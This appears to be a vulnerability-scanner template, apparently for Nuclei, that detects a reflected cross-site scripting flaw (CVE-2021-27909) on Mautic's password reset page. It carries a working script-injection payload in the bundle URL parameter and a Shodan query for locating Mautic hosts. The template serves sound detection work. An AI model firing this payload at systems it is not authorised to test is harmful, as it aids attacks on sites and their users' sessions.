-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2021-27909.yaml
44 lines (38 loc) · 1.21 KB
/
CVE-2021-27909.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
id: CVE-2021-27909
info:
name: Mautic <3.3.4 - Cross-Site Scripting
author: kiransau
severity: medium
description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks.
reference:
- https://github.com/mautic/mautic/security/advisories/GHSA-32hw-3pvh-vcvc
- https://nvd.nist.gov/vuln/detail/CVE-2021-27909
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-27909
cwe-id: CWE-79
metadata:
shodan-query: title:"Mautic"
verified: "true"
tags: cve,cve2021,mautic,xss
requests:
- method: GET
path:
- "{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'';alert(document.domain);var ok='"
- 'mauticBasePath'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by md on 2022/10/17